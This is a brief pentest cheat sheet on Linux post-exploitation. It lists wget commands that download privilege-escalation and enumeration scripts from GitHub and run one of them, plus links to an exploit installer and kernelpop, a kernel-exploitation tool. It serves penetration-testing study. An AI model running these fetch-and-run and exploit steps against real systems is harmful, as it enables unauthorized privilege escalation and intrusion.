Comment on page
Linux post exploitation scripts
wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
sed -i -e 's/\r$//' bangenum.sh
./bangenum.sh
What is running, any cron jobs any scripts? Use PSPY to find out
https://github.com/DominicBreuker/pspy
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/Anon-Exploiter/SUID3NUM
wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py
USAGE: xploit_installer.py <exploit id>
wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh
wget https://raw.githubusercontent.com/Arr0way/linux-local-enumeration-script/master/linux-local-enum.sh
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh
Automated kernel vulnerability enumeration and exploitation
https://github.com/spencerdodd/kernelpop